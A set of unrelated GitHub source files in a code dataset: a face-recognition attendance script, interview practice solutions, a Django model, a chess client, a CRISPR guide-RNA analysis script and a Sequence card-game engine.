known_face_names.append(str(img_name))\n return known_face_names\n\ndef save_input_feature_embedding(inputs_embedding, known_faces):\n\n x = zip(known_faces, inputs_embedding)\n features = []\n for itr in x:\n features.append({itr[0]:itr[1]})\n\n\n with open('input_data.p', 'wb') as fp:\n pickle.dump(features, fp, protocol=pickle.HIGHEST_PROTOCOL)\n\ndef load_input_feature_embedding():\n with open('input_data.p', 'rb') as fp:\n data = pickle.load(fp)\n return data\n\ndef face_matching_from_image(img_path, predict_embedding, data, face_array_and_loc, tolerance):\n img = plt.imread(img_path)\n img_name = os.path.basename(img_path)\n for idx1, emb in enumerate(predict_embedding):\n name = 'Unknown'\n matches = []\n for d in data:\n for k,v in d.items():\n dist = euclidean(emb, v)\n matches.append({k:dist})\n\n # index_min = np.argmin(matches)\n for m in matches:\n for k,v in m.items():\n if v <= int(tolerance):\n name = str(k)\n x, y, width, height = face_array_and_loc['face_location'][idx1]['box']\n image = cv2.rectangle(img, (x, y), (x + width, y + height), (255, 36, 12), 1)\n cv2.putText(image, name, (x, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (255, 36, 12), 1)\n\n plt.imshow(image)\n plt.show()\n cv2.imwrite('./output_dir/'+ img_name, cv2.cvtColor(image, cv2.COLOR_RGB2BGR))\n\ndef face_matching_from_video(img, predict_embedding, data, face_array_and_loc, tolerance):\n # img = plt.imread(img_path)\n # img_name = os.path.basename(img_path)\n for idx1, emb in enumerate(predict_embedding):\n name = 'Unknown'\n matches = []\n for d in data:\n for k,v in d.items():\n dist = euclidean(emb, v)\n matches.append({k:dist})\n\n # index_min = np.argmin(matches)\n for m in matches:\n for k,v in m.items():\n if v <= int(tolerance):\n name = str(k)\n x, y, width, height = face_array_and_loc['face_location'][idx1]['box']\n image = cv2.rectangle(img, (x, y), (x + width, y + height), (255, 36, 12), 1)\n cv2.putText(image, name, (x, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (255, 36, 12), 1)\n return img\n # plt.imshow(image)\n # plt.show()\n # fourcc = cv2.VideoWriter_fourcc(*'XVID')\n # output_movie = cv2.VideoWriter('output_now.avi', fourcc, 29.97, (640, 360))\n # output_movie.write(img)\n # 
cv2.imwrite('./output_dir_now_video/'+ img_name, cv2.cvtColor(image, cv2.COLOR_RGB2BGR))\n\ndef get_video_frame_recognition():\n import numpy as np\n import cv2\n\n cap = cv2.VideoCapture('videoplayback.mp4')\n\n # Define the codec and create VideoWriter object\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter('output.avi', fourcc, 20.0, (640, 480))\n\n while (cap.isOpened()):\n ret, frame = cap.read()\n if ret == True:\n # frame = cv2.flip(frame, 0)\n predict_face_array_list, face_location, face_array_and_loc = get_faces_cropped_from_prediction_video(\n detector, frame)\n data = load_input_feature_embedding()\n predict_embedding = get_embedding(model, predict_face_array_list)\n frame_matched = face_matching_from_video(frame, predict_embedding, data, face_array_and_loc, tolerance=10)\n print(\"Video saved\")\n\n # write the flipped frame\n out.write(frame_matched)\n\n # cv2.imshow('frame', frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n else:\n break\n\n # Release everything if job is finished\n cap.release()\n out.release()\n cv2.destroyAllWindows()\n\n\n\nif __name__ == '__main__':\n\n model = load_model('model/facenet_keras.h5')\n detector = MTCNN()\n data = load_input_feature_embedding()\n parser = argparse.ArgumentParser()\n parser.add_argument(\"select\",\n help=\"select training or inference\", type=str)\n\n parser.add_argument(\"-img\",\"--image\",\n help=\"image file name from predict dir\", type=str)\n args = parser.parse_args()\n select = args.select\n\n if select == 'train':\n input_dir = './input_dir'\n input_faces_array_list = get_faces_cropped_from_input(detector, input_dir)\n known_faces = get_face_names(input_dir)\n inputs_embedding = get_embedding(model, input_faces_array_list)\n save_input_feature_embedding(inputs_embedding, known_faces)\n\n elif select == 'inference':\n predict_dir = './predict_dir'\n img_path = predict_dir + '/' + args.image\n print(args.image)\n predict_face_array_list, face_location, face_array_and_loc = get_faces_cropped_from_prediction(detector, img_path)\n data = load_input_feature_embedding()\n predict_embedding = get_embedding(model, predict_face_array_list)\n face_matching_from_image(img_path, predict_embedding, data, face_array_and_loc, tolerance=10)\n print(\"Image saved\")\n\n elif select == 'video':\n # Get frames from video and save to directory\n get_video_frame_recognition()\n # predict_dir = './output_dir_video'\n # # lsorted = sorted(l, key=lambda x: int(os.path.splitext(x)[0]))\n # for img_file in (os.listdir(predict_dir)):\n # img_path = predict_dir + '/' + img_file\n # print(img_path)\n # predict_face_array_list, face_location, face_array_and_loc = get_faces_cropped_from_prediction_video(detector, img)\n # data = load_input_feature_embedding()\n # predict_embedding = get_embedding(model, predict_face_array_list)\n # face_matching_from_video(img_path, predict_embedding, data, face_array_and_loc, tolerance=10)\n # print(\"Video saved\")\n","repo_name":"HiteshAI/face_recognition_for_attendance","sub_path":"face_recognition.py","file_name":"face_recognition.py","file_ext":"py","file_size_in_byte":11180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22847583637","text":"class Solution:\n # @param A : list of integers\n # @param B : list of integers\n # @return an integer\n def coverPoints(self, A, B):\n if len(A) in [0, 1]:\n return 0\n x = A[0]\n y = B[0]\n dist = 0\n for i in range(1, len(A)):\n distX = abs(A[i] - x)\n distY = abs(B[i] - y)\n x = 
A[i]\n y = B[i]\n dist += max(distX, distY)\n return dist\n","repo_name":"rednithin/InterviewBit","sub_path":"MinStepsInInfiniteGrid.py","file_name":"MinStepsInInfiniteGrid.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70018921767","text":"from django.contrib.auth.models import User\nfrom django.db import models\n\n# Create your models here.\n\n\nclass UserProfile(models.Model):\n profile_picture = models.ImageField(\n upload_to='images/profile_pictures'\n )\n user = models.OneToOneField(\n User,\n on_delete=models.CASCADE,\n primary_key=True,\n )\n\n","repo_name":"kaloyan03/Softuni-Python","sub_path":"Python Web Basics/petstagram/petstagram/accounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36738219082","text":"import json\nimport logging\nimport sys\nimport threading\nimport time\n\nfrom game.Game import Game\nfrom networking.command import *\nfrom networking.network import Network\nfrom player.PlayerManager import PlayerManager\n\n\ndef network_thread(some_param):\n logging.info(\"hello\")\n\n run = True\n n = Network()\n\n pm = PlayerManager.get_instance()\n\n game_is_on = False\n my_id = None\n\n req = HelloCommand()\n res = Command.parse(n.send(req.print()))\n logging.info(f\"=> {res.print()}\")\n\n if res.type == CommandType.HELLO:\n my_id = int(res.payload[7:])\n logging.info(f\"i am {my_id}\")\n\n while run:\n\n if game_is_on:\n if Game.get_instance().is_quit():\n print(\"Game is over, network thread exiting\")\n break\n\n if pm.get_instance().my_turn():\n if Game.get_instance().board.state.type_of_state() == 'frozen' \\\n or Game.get_instance().board.state.type_of_state() == 'won_game':\n # player chose action, we can send it to the network\n state_json = json.dumps(Game.get_instance().board.export_state())\n req = StepCommand(state_json)\n else:\n # player is choosing figure and destination\n time.sleep(.5)\n continue\n else:\n req = PingCommand()\n else:\n req = PingCommand()\n\n res_raw = n.send(req.print())\n if res_raw is None or res_raw == \"\":\n print(f\"got: {res_raw}\")\n continue\n res = Command.parse(res_raw)\n logging.info(f\"=> {res.print()}\")\n\n if res.type == CommandType.STATE:\n game_is_on = True\n\n if pm.get_instance().my_player is None:\n pm.add_own_player_id(my_id)\n pm.add_other_player_id(1 - my_id)\n\n pm.create_players(0)\n\n new_state_json = res.payload[10:]\n new_state = None\n try:\n if len(new_state_json) > 0:\n new_state = json.loads(new_state_json)\n except Exception as e:\n logging.error(f\"json decode error {e}\")\n continue\n\n if len(new_state_json) > 0 and new_state is not None:\n Game.get_instance().board.import_state(new_state)\n\n if int(res.payload[8:9]) == my_id:\n logging.info(\"my turn\")\n pm.get_instance().turn_of(my_id)\n Game.get_instance().board.transition_to(Game.get_instance().board.choosing_acting_figure_state)\n else:\n pm.get_instance().turn_of(1 - my_id)\n\n elif res.type == CommandType.WAIT:\n pass\n\n elif res.type == CommandType.ERROR:\n print(\"recieved error\")\n pass\n\n else:\n logging.warning(\"unexpected message\")\n\n time.sleep(1)\n\n\ndef run_network_thread():\n x = threading.Thread(target=network_thread, args=(1,))\n x.start()\n\n\nif __name__ == '__main__':\n print(\"running with args\", sys.argv)\n if len(sys.argv) > 1:\n if sys.argv[1] == \"debug\":\n 
logging.basicConfig(level=logging.DEBUG)\n\n run_network_thread()\n","repo_name":"sebinemeth/chesscraft-client","sub_path":"networking/network_client.py","file_name":"network_client.py","file_ext":"py","file_size_in_byte":3258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13728897899","text":"\"\"\"\nInstall the viewser package\n\"\"\"\nimport setuptools\n\nwith open(\"README.md\") as f:\n long_description = f.read()\n\nsetuptools.setup(\n name=\"viewser\",\n version=\"0.0.1\",\n author=\"Peder G. Landsverk\",\n author_email=\"pedlan@prio.org\",\n description=\"Client library for interacting with ViEWS cloud\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/uppsalaconflictdataprogram/viewser\",\n packages=setuptools.find_packages(),\n python_requires=\"==3.8.5\",\n install_requires=[\n \"pyarrow==2.0.0\",\n \"pandas==1.2.0\",\n \"requests==2.25.1\",\n \"fire==0.3.1\"\n ],\n scripts=[\n \"bin/vsr\"\n ]\n)\n","repo_name":"UppsalaConflictDataProgram/viewser","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73953936169","text":"\n\nclass Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\n \nclass PalindromeLinkedList:\n# O(n) || O(1) where n is the nuber of elements present in the\n def isPalindrome(self, node):\n slow, fast = node, node.next\n\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n \n middleNode = slow.next\n slow.next = None\n\n reversedList = self.reverseLinkedList(middleNode)\n\n firstHalf = node\n\n while reversedList is not None:\n if reversedList.value != firstHalf.value:\n return False\n reversedList = reversedList.next\n firstHalf = firstHalf.next\n\n return True\n\n \n def reverseLinkedList(self, middleNode):\n prev = None\n while middleNode is not None:\n next = middleNode.next\n middleNode.next = prev\n prev = middleNode\n middleNode = next\n\n return prev\n\n \n\n# O(N) || O(N) where n is the number of nodes present in the linkedlist\n def palindromeLinkedListByList(self, node):\n if not node:\n return node\n\n stack = []\n\n while node is not None:\n stack.append(node.value)\n node = node.next\n\n left, right = 0, len(stack) - 1\n\n while left < right:\n if stack[left] == stack[right]:\n left += 1\n right -= 1\n else:\n return False\n\n\n return True\n\n\nnode = Node(1)\nnode.next = Node(1)\nnode.next.next = Node(2)\nnode.next.next.next = Node(1)\nnode.next.next.next.next = Node(1)\n\nsol = PalindromeLinkedList()\n\n\nprint(sol.isPalindrome(node))\n# print(sol.palindromeLinkedListByList(node))","repo_name":"ArshErgon/Leetcode-Question-Solution","sub_path":"LeetCode/easy/palindromeLinkedList.py","file_name":"palindromeLinkedList.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28792800993","text":"\"\"\"\nStep 1: board\nStep 2: display board\nStep 3: play game\nStep 4: handle turn\nStep 5: check win (if game over)\n 5.1: check rows\n 5.2: check columns\n 5.3: check diagonals\nStep 6: check tie\nStep 7: flip player\n\"\"\"\n\n#----Global Variables-----\n\n#Game board\nboard = [\"-\",\"-\",\"-\",\n \"-\",\"-\",\"-\",\n \"-\",\"-\",\"-\"]\n\n#if is still going\ngame_still_going = True\n\n#Who won?\nwinner = None\n\n#Who's turn is 
it\ncurrent_player = \"X\"\n\n#display board\ndef display_board():\n print(board[0] + \"|\" +board[1] + \"|\" + board[2] + \"|\")\n print(board[3] + \"|\" + board[4] + \"|\" + board[5] + \"|\")\n print(board[6] + \"|\" + board[7] + \"|\" + board[8] + \"|\")\n\n#Play a game of tic tac toe\ndef play_game():\n #Display the initial board\n display_board()\n\n #while the game is still going\n while game_still_going:\n \n #handle a single turn of an arbitrary player\n handle_turn(current_player)\n\n #check if the game has ended\n check_if_game_over()\n\n #flip to the game has player\n flip_player()\n\n\n#The game has ended\nif winner == \"X\" or winner ==\"O\":\n print(winner + \" won\")\nelif winner == None:\n print(\"It's a tie.\")\n \n#Handle a single turn of an arbitrary player \ndef handle_turn(player):\n position_str = input(\"Choose a position from 1 to 9: \")\n position = int(position_str) - 1 #since board has positions 0-8 we need to subtrace one from position so it knows excatly where to go\n\n board[position] = \"X\"\n\n display_board()\n\n\ndef check_if_game_over():\n check_for_winner()\n check_if_tie()\n\ndef check_for_winner():\n\n #set up global variables so that winner is inside the scope of check_for_winner\n global winner\n \n #check row\n row_winner = check_row()\n #check columns\n columns_winnr = check_columns()\n #check diagonals\n diagonal_winner = check_diagonals()\n \n if row_winner:\n\n winner = row_winner()\n \n elif column_winner:\n \n winner = column_winner()\n \n elif diagonal_winner:\n \n winner = diagonal_winner()\n \n else:\n \n winner = None\n \n return\n\n#check rows\ndef check_rows():\n row_1 = board[0] == board[1] == board[2] != \"-\"\n row_2 = board[3] == board[4] == board[5] != \"-\"\n row_3 = board[6] == board[7] == board[8] != \"-\"\n return\n\n#check colums\ndef check_columns():\n column_1 = board[1] == b\n return\n\n#check diagonals\ndef check_diagonals():\n return\n\ndef check_if_tie():\n \n return\n\ndef flip_player():\n return\n\n\nplay_game()\n","repo_name":"mariannauf/TicTacToe","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37016671747","text":"from setuptools import setup, find_packages\n\ninstall_requires = [\n \"alembic==1.7.6\",\n \"cryptography==36.0.1\",\n \"flask==1.1.0\",\n \"itsdangerous==2.0.1\",\n \"orjson==3.6.7\",\n \"pydantic==1.9.0\",\n \"PyMySQL==1.0.2\",\n \"sqlalchemy==1.4.31\",\n \"structlog==21.5.0\",\n]\ndeploy_requires = [\"uwsgi==2.0.20\"]\ndev_requires = [\"autoflake==1.4\", \"black==22.1.0\", \"isort==5.10.1\"]\ntest_requires = [\n \"coverage==6.3.1\",\n \"pytest==7.0.1\",\n \"pytest-cov==3.0.0\",\n \"pytest-html==3.1.1\",\n \"tox==3.24.5\",\n]\n\nsetup(\n name=\"gogolook\",\n version=\"0.1.0\",\n description=\"A Restful task list API\",\n author=\"Jacob Chen\",\n author_email=\"chenjr0719@gmail.com\",\n packages=find_packages(exclude=[\"tests\"]),\n install_requires=install_requires,\n extras_require={\n \"dev\": dev_requires + test_requires,\n \"test\": test_requires,\n \"deploy\": deploy_requires,\n },\n)\n","repo_name":"chenjr0719/Gogolook-Exercise","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29608756062","text":"count = 0\r\nred = 1\r\nfor i in range(1, 1001):\r\n if i % 12 == 0 and i % 7 != 0:\r\n print(i, end = 
\" \")\r\n count = count + 1\r\n red = red + 1\r\n if red > 6:\r\n red = 1\r\n print()\r\n\r\nprint(f\"Ukupno je ispisano {count} brojeva.\")","repo_name":"miki261/vsite","sub_path":"(3).py","file_name":"(3).py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70021019368","text":"from Bio import SeqIO\nimport glob\nfrom time import clock\nimport re\nimport numpy as np\n\nimport Util\nimport Logic\nimport LogicPrep\nimport Valid\n\n############### start to set env ################\nWORK_DIR = \"D:/000_WORK/JangHyeWon_ShinJeongHong/20200527/WORK_DIR/\"\n\nREF_PATH = \"D:/000_WORK/000_reference_path/monkey/Crab-eating macaque/\"\nCDS_FILE = \"cds/Macaca_fascicularis.Macaca_fascicularis_5.0.cds.all.fa\"\nTEST_CDS_FILE = \"cds/Macaca_fascicularis.Macaca_fascicularis_5.0.cds.test.fa\"\n\nANNO_FILE = \"genbank_anno/macaca_fascicularis/Macaca_fascicularis.Macaca_fascicularis_5.0.100.chromosome.\"\n\nFRONT_WIN_LEN = 4\ngRNA_LEN = 20\nPAM_SEQ = \"NGG\"\nBACK_WIN_LEN = 20\n\nIGNORE_CHR_LIST = ['MT', 'KE']\nINIT_DEEP_PE = [PAM_SEQ, FRONT_WIN_LEN, gRNA_LEN, BACK_WIN_LEN]\nA_or_C_IDX = [4, 10]\nACTG_RULE = ['A', 'C']\n############## make_deep_pe_input ##############\n\nBE_BACK_WIN_LEN = 3\nCLEAVAGE_SITE = 3\nMAX_MISMATCH = 3\nREF_SRV_PATH = \"FASTA/Crab-eating macaque\"\n\n\nINIT_BE = [PAM_SEQ, FRONT_WIN_LEN, gRNA_LEN, BE_BACK_WIN_LEN, CLEAVAGE_SITE]\nINITIAL_CAS_OFF1 = ['NGG', gRNA_LEN, MAX_MISMATCH, 66, WORK_DIR + \"CAS_OFF_FINDER/crab_eating_monkey_off_\", REF_SRV_PATH, INIT_BE]\nINITIAL_CAS_OFF2 = ['NGG', gRNA_LEN, MAX_MISMATCH, 1, WORK_DIR + \"CAS_OFF_FINDER/crab_eating_monkey_off_aqia_\", REF_SRV_PATH, INIT_BE]\n#################### top N #####################\nTOP_N = 10\nTOP_N_ALL = 100\nINIT_MERGE_BY_CHAR = [REF_PATH, CDS_FILE, A_or_C_IDX, ACTG_RULE, WORK_DIR, TOP_N]\nINIT_MERGE_BY_ALL = [REF_PATH, CDS_FILE, A_or_C_IDX, ACTG_RULE, WORK_DIR, TOP_N_ALL]\n############### end setting env ################\n\n\ndef sort_n_merge_by_all():\n logic = Logic.Logics()\n logic.sort_n_merge_by_all(INIT_MERGE_BY_ALL, INIT_BE, IGNORE_CHR_LIST)\n\ndef sort_n_merge_by_chr():\n logic = Logic.Logics()\n logic.sort_n_merge_by_chr(INIT_MERGE_BY_CHAR, INIT_BE, IGNORE_CHR_LIST)\n\ndef merge_cas9_abe_cbe():\n logic = Logic.Logics()\n logic_prep = LogicPrep.LogicPreps()\n util = Util.Utils()\n\n trgt_seq_dict = logic_prep.get_target_seq_with_clvg_site(REF_PATH + CDS_FILE, INIT_BE)\n chr_dict, aqia_chr_dict = logic_prep.target_seq_with_clvg_site_group_by_chromosome(trgt_seq_dict, \":Macaca_fascicularis_5.0:\", IGNORE_CHR_LIST)\n\n a_c_dict= logic.filter_out_by_ACGTU_rule(chr_dict, A_or_C_IDX, ACTG_RULE)\n aqia_a_c_dict = logic.filter_out_by_ACGTU_rule(aqia_chr_dict, A_or_C_IDX, ACTG_RULE)\n\n abe_score_dict = logic_prep.get_deep_base_ed_score(WORK_DIR + \"deep_ABE/ABE_Efficiency.txt\")\n cbe_score_dict = logic_prep.get_deep_base_ed_score(WORK_DIR + \"deep_CBE/CBE_Efficiency.txt\")\n cs9_score_dict = logic_prep.get_deep_cas9_tupl(WORK_DIR + \"deep_cas_9/\", \"RANK_final_DeepCas9_Final.txt\",\n \"sample.txt\")\n\n util.make_merge_excel_by_chr(WORK_DIR + \"merge_cas9_abe_cbe/crab_eating_monkey_merge_abe_cbe_cas9\",\n [a_c_dict, abe_score_dict, cbe_score_dict, cs9_score_dict], INIT_BE)\n\n util.make_merge_excel(WORK_DIR + \"merge_cas9_abe_cbe/crab_eating_monkey_merge_abe_cbe_cas9_AQIA\",\n [aqia_a_c_dict, abe_score_dict, cbe_score_dict, cs9_score_dict], INIT_BE)\n\ndef make_deep_cas9_base_editor_input():\n logic = 
Logic.Logics()\n    logic_prep = LogicPrep.LogicPreps()\n    util = Util.Utils()\n\n    trgt_seq_dict = logic_prep.get_target_seq_with_clvg_site(REF_PATH + CDS_FILE, INIT_BE)\n    chr_dict, aqia_chr_dict = logic_prep.target_seq_with_clvg_site_group_by_chromosome(trgt_seq_dict,\n                                                                                      \":Macaca_fascicularis_5.0:\",\n                                                                                      IGNORE_CHR_LIST)\n\n    a_c_dict = logic.filter_out_by_ACGTU_rule(chr_dict, A_or_C_IDX, ACTG_RULE)\n    aqia_a_c_dict = logic.filter_out_by_ACGTU_rule(aqia_chr_dict, A_or_C_IDX, ACTG_RULE)\n\n    util.make_cas_off_finder_input(a_c_dict, INITIAL_CAS_OFF1)\n    util.make_cas_off_finder_input(aqia_a_c_dict, INITIAL_CAS_OFF2)\n\n    util.make_deep_cas9_input(WORK_DIR + \"deep_cas_9/sample\", [a_c_dict, aqia_a_c_dict], INIT_BE)\n\ndef make_deep_pe_input():\n    logic = Logic.Logics()\n    logic_prep = LogicPrep.LogicPreps()\n    util = Util.Utils()\n\n    trgt_seq_dict = logic_prep.get_target_seq(REF_PATH + CDS_FILE, INIT_DEEP_PE)\n    result_dict, aqia_dict = logic_prep.group_by_chromosome(trgt_seq_dict, \":Macaca_fascicularis_5.0:\", IGNORE_CHR_LIST)\n\n    # util.make_Deep_PE_input_excel(WORK_DIR + \"marmoset/\", result_dict, INIT_DEEP_PE)\n    # util.make_Deep_PE_input_AQIA(WORK_DIR + \"marmoset/\", aqia_dict)\n    util.make_Deep_PE_input_tb_txt(WORK_DIR + \"marmoset/deep_pe_input_marmoset\", result_dict)\n    util.make_Deep_PE_input_tb_txt(WORK_DIR + \"marmoset/deep_pe_input_marmoset_aqia\", aqia_dict)\n\nstart_time = clock()\nprint(\"start >>>>>>>>>>>>>>>>>>\")\n# make_deep_pe_input()\n# make_deep_cas9_base_editor_input()\n## merge_cas9_abe_cbe()\n# sort_n_merge_by_chr()\nsort_n_merge_by_all()\nprint(\"::::::::::: %.2f seconds ::::::::::::::\" % (clock() - start_time))","repo_name":"astroboi-SH-KWON/analyze_Crab-eating-macaque_monkey","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":5028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31277193594","text":"from enum import Enum\nfrom .utils import Piece, ByPassPiece, BoardViewer, lines_collector\nfrom .defaults import *\nfrom random import shuffle\n\n\nclass Event(Enum):\n    # Report beginning\n    # params: ()\n    NEW_GAME = 0\n\n    # Player puts a new chip on the board\n    # params: (playerId, card, color, position)\n    PLAY = 1\n\n    # Player removes a chip from the board\n    # params: (playerId, card, position)\n    REMOVE = 2\n\n    # Player completes a sequence\n    # params: (playerId, color, size)\n    SEQUENCE = 3\n\n    # Player changes a card\n    # params: (playerId, card)\n    DISCARD = 4\n\n    # Player passes\n    # params: (playerId)\n    PASS = 5\n\n    # Report winner\n    # params: (playerId, color)\n    WIN = 6\n\n    # Report deck refill\n    REFILL_DECK = 7\n\n\nclass Sequence:\n    \"\"\"\n    Instance that contains the logic of a single match.\n    \"\"\"\n    def __init__(self):\n        self.deck = None             # Game deck\n        self.logs = None             # Game history\n        self._board = None           # Game board\n        self.count = None            # Number of positions used of the board\n        self.score = None            # Score per color (i.e. number of consecutive sequences)\n        self.colors = None           # Players color\n        self.players = None          # Players list\n        self.board_size = None       # Amount of positions of the board\n        self.win_strike = None       # Number of consecutive sequences needed to win the game\n        self.sequence_id = None      # Incremental id for identifying each sequence\n        self.can_discard = None      # Indicate if the current player can discard a card\n        self.discard_pile = None     # Players discarded cards\n        self.current_player = None   # Id of the current player\n        self.cards_per_player = None # Number of cards per player\n        
self.number_of_players = None # Number of players\n\n    def log(self, data):\n        self.logs.append(data)\n\n    def _partners(self, player):\n        color = self.colors[player]\n        for i, c in enumerate(self.colors):\n            if i != player and c == color:\n                yield i\n\n    def empty(self, i, j):\n        return not self._board[i][j]\n\n    def is_winner(self, playerId):\n        return self.colors[playerId] == self.winner\n\n    def reset(self, hand, number_of_players, players_colors, cards_per_player, win_strike=2):\n        self.win_strike = win_strike\n        self.colors = players_colors\n        self.cards_per_player = cards_per_player\n        self.players, self.deck = hand(number_of_players, cards_per_player)\n        self.number_of_players = number_of_players\n\n        self.logs = []\n        self.sequence_id = 0\n        self.discard_pile = []\n        self.current_player = 0\n        self.can_discard = True\n        self._board = [[Piece() for _ in range(len(l))] for l in BOARD]\n        self.board_size = sum(len(l) for l in self._board) - 4\n        self.count = 0\n        for i, j in CORNERS:\n            self._board[i][j] = ByPassPiece(\"X\")\n        self.score = {i:0 for i in set(players_colors)}\n\n        self.log((Event.NEW_GAME,))\n\n    def _is_dead_card(self, card):\n        _, number = card\n        if number is JACK:\n            return False # //TODO: Not sure about it\n        for (i, j) in CARDS_POSITIONS[card]:\n            if self.empty(i, j):\n                return False\n        return True\n\n    def check_valid(self, action):\n        return action in self._valid_moves()\n\n    def _valid_moves(self):\n        return Sequence.valid_moves(self.board, self.cards, self.can_discard, self.color)\n\n    def _is_over(self):\n        if max(self.score.values()) >= self.win_strike:\n            self.log((Event.WIN, self.current_player, self.color))\n            return True\n        if self.count == self.board_size:\n            for e, *data in self.logs:\n                if e is Event.SEQUENCE:\n                    player, color, _ = data\n                    self.log((Event.WIN, player, color))\n                    break\n            else:\n                self.log((Event.WIN, None, None))\n            return True\n        return False\n\n    def _sequence(self, size, data):\n        # skip empty findings\n        if not size:\n            return\n        # set the sequence number in each board position\n        for i, j in data[:size]:\n            self._board[i][j].set_sequence(self.sequence_id)\n        # increase the sequence number\n        self.sequence_id += 1\n        # update players score\n        self.score[self.color] += 1 + (size > 5)\n        # Report the sequence\n        self.log((Event.SEQUENCE, self.current_player, self.color, size))\n\n    def _next(self):\n        over = self._is_over()\n        self.can_discard = True\n        self.current_player = (self.current_player + 1) % len(self.players)\n        return over\n\n    def _discard(self, card):\n        player = self.players[self.current_player]\n        player.remove(card)\n        self.discard_pile.append(card)\n        if self.deck:\n            player.draw(self.deck.pop())\n        if not self.deck:\n            self.log((Event.REFILL_DECK,))\n            self.deck = self.discard_pile[:]\n            self.discard_pile = []\n            shuffle(self.deck)\n\n    def step(self, action):\n        \"\"\"\n        `action` must be a tuple of the form `(card, position)` where:\n\n        * card is `(enum, int)`\n\n        * position is None if the player is discarding the card.\n\n        * position is (int, int) if the player is playing the card\n\n        raise ValueError if it's an invalid move.\n        \"\"\"\n        if not self.check_valid(action):\n            raise ValueError(f\"Invalid move ({action})\")\n\n        # Check PASS\n        if action is None:\n            self.log((Event.PASS, self.current_player))\n            return self._next()\n\n        card, pos = action\n        self._discard(card)\n        # Check DISCARD\n        if pos is None:\n            self.log((Event.DISCARD, self.current_player, card))\n            self.can_discard = False # Discard only one card per turn\n            return False # Game not finished, still the current_player turn\n\n        i, j = 
pos\n\n        # check REMOVE action\n        if self._board[i][j]:\n            self._board[i][j] = Piece()\n            self.count -= 1\n            self.log((Event.REMOVE, self.current_player, card, pos))\n            return self._next()\n\n        # Normal play, or a JACK\n        self.log((Event.PLAY, self.current_player, card, self.color, pos))\n        self._board[i][j] = Piece(self.color)\n        self.count += 1\n\n        # check for sequences\n\n        data = lines_collector(self._board, self.color, i, j)\n\n        for line in data:\n            size = len(line)\n            # a line of 5-8 chips completes one sequence, 9+ completes two\n            seq = [0, 5, 9][(size >= 5) + (size >= 9)]\n            self._sequence(seq, line)\n\n        return self._next()\n\n    @property\n    def cards(self):\n        return self.players[self.current_player].view()()\n\n    @property\n    def color(self):\n        return self.colors[self.current_player]\n\n    @property\n    def partners(self):\n        return self._partners(self.current_player)\n\n    @property\n    def board(self):\n        return BoardViewer(self._board)\n\n    @property\n    def winner(self):\n        assert self.logs[-1][0] == Event.WIN\n        return self.logs[-1][2]\n\n    @property\n    def view(self):\n        return SequenceView(self)\n\n    @staticmethod\n    def valid_moves(board, cards, can_discard, pcolor):\n        # List all valid moves in the form (card, position).\n        valids = []\n\n        for card in cards:\n            try:\n                is_dead = True\n                for i, j in CARDS_POSITIONS[card]:\n                    if not board[i, j]:\n                        is_dead = False\n                        valids.append((card, (i, j)))\n                if can_discard and is_dead:\n                    valids.append((card, None))\n            except KeyError:\n                ctype, number = card\n                assert number is JACK, f\"Unexpected card number ({number})\"\n                if ctype in REMOVE:\n                    for (i, j), piece in board:\n                        if (i, j) in CORNERS:\n                            continue\n                        if piece and piece.color != pcolor and not piece.fixed:\n                            if ((Card.CLUBS, 11), (i, j)) in valids or ((Card.SPADES, 11), (i, j)) in valids:\n                                continue\n                            valids.append((card, (i, j)))\n                else:\n                    for (i, j), piece in board:\n                        if (i, j) in CORNERS:\n                            continue\n                        if not (piece.bypass() or piece):\n                            if ((Card.DIAMOND, 11), (i, j)) in valids or ((Card.HEART, 11), (i, j)) in valids:\n                                continue\n                            valids.append((card, (i, j)))\n        valids = list(set(valids))\n        return valids if valids else [None]\n\n\nclass SequenceManager:\n    @property\n    def cur_player(self):\n        return self.players[self.seq.current_player]\n\n    def feed_logs(self):\n        while self.logs_transmitted < len(self.seq.logs):\n            data = self.seq.logs[self.logs_transmitted]\n            for player in self.players:\n                player.log(data)\n            self.logs_transmitted += 1\n\n    def init(self, hand, players, players_colors, cards_per_player, win_strike=2):\n        self.logs_transmitted = 0\n        self.players = [player(i) for i, player in zip(\"0123\", players)]\n        self.seq = Sequence()\n\n        self.seq.reset(hand, len(players), players_colors, cards_per_player, win_strike)\n\n        for i, player in enumerate(self.players):\n            player.reset(\n                i,\n                self.seq.players[i].view(),\n                self.seq.view\n            )\n        self.feed_logs()\n\n    def step(self, fixed_action=False, action=None):\n        if not fixed_action:\n            action = self.cur_player.step()\n        done = self.seq.step(action)\n        self.feed_logs()\n        return done\n\n    def run(self, hand, players, players_colors, cards_per_player, win_strike=2):\n        self.init(hand, 